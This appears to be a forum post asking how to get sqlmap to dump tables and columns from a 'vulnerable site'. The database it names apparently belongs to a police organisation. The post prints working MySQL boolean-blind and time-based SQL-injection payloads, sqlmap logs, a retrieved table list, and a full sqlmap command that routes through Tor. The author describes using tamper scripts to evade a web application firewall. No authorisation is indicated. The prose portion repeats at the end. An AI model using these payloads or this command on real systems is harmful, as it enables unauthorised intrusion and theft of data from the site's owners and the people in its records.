I am having issues dumping columns and tables on a vulnerable site with the following points:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: id=275' OR NOT 8874=8874 AND 'kWVH'='kWVH
Vector: OR NOT [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=275' AND SLEEP(10) AND 'NtME'='NtME
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[13:38:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache, PHP 5.2.11, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
It has a meta refresh header which I have put into action by sqlmap:
[13:37:51] [DEBUG] got HTML meta refresh header
sqlmap got a refresh request (redirect like response common to login pages). Do you want to apply the refresh from now on (or stay on the original page)? [Y/n] y
I can dump one of the database tablenames but other then that there is not columns being dumped or anything else, what I'm seeing on my end is:
[13:49:26] [ERROR] invalid character detected. retrying..
[13:49:31] [INFO] retrieved:
[13:49:31] [DEBUG] performed 10 queries in 12.60 seconds
[13:49:31] [INFO] retrieving the length of query output
[13:52:07] [DEBUG] got HTTP error code: 503 (Service Unavailable) # this is a little weird.
[13:52:07] [PAYLOAD] 275' AND 6147=IF((ORD(MID((SELECT HEX(IFNULL(CAST(table_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x706871 LIMIT 39,1),1,1))>1),SLEEP(10),6147) AND 'oduk'='oduk
[13:52:09] [DEBUG] got HTTP error code: 503 (Service Unavailable)
[13:52:09] [INFO] retrieved:
[13:52:09] [DEBUG] performed 4 queries in 4.94 seconds
Database: phq
[24 tables]
+------------------------------+
| cdm_forme\xe1}_i�p_p�t\x83 |
| cbd_careerrecruitment |
| cbd_catagory |
| cbd_cc |
| cbd_content |
| cbd_ig_msg |
| cbd_menu |
| cbd_menutype |
| cbd_news |
| cbd_noc |
| cbd_ordinance |
| cbd_police_achivement |
| cbd_police_service |
| cbd_press |
| cbd_procurement |
| cbd_recruitment |
| cbd_recruitment_desc |
| cbd_recruitment_result |
| cbd_rejoinder |
| cbd_tab |
| cbd_topnews |
| cbd_un |
| cdb_ |
| cdb_unitdetials |
+------------------------------+
From here I'm getting:
[13:53:09] [INFO] retrieved:
[13:53:09] [DEBUG] performed 4 queries in 46.63 seconds
[13:53:09] [ERROR] unable to retrieve the number of columns for table 'cdm_forme\xe1}_i�p_p�t\x83' in database 'phq'
And so on and so forth, this site is protected by a WAF (generic unknown) tamper scripts are producing the same information and output (space2comment apostrephemask, etc..)
How I've been trying:
./sqlmap.py -u www.vuln.com/content.php?id=275 --tor --check-tor --level=5 --risk=3 -vv -D phq --tables --columns --dump --invalid-bignum --invalid-string --threads=10 --hex
Question being, do you have any idea on how I can get sqlmap to co-operate with me here? I can manually inject with the found injection points, however I am unable to get sqlmap to do the auto injection for me. Need some help
I am having issues dumping columns and tables on a vulnerable site with the following points:
It has a meta refresh header which I have put into action by sqlmap:
I can dump one of the database tablenames but other then that there is not columns being dumped or anything else, what I'm seeing on my end is:
From here I'm getting:
And so on and so forth, this site is protected by a WAF (generic unknown) tamper scripts are producing the same information and output (space2comment apostrephemask, etc..)
How I've been trying:
Question being, do you have any idea on how I can get sqlmap to co-operate with me here? I can manually inject with the found injection points, however I am unable to get sqlmap to do the auto injection for me. Need some help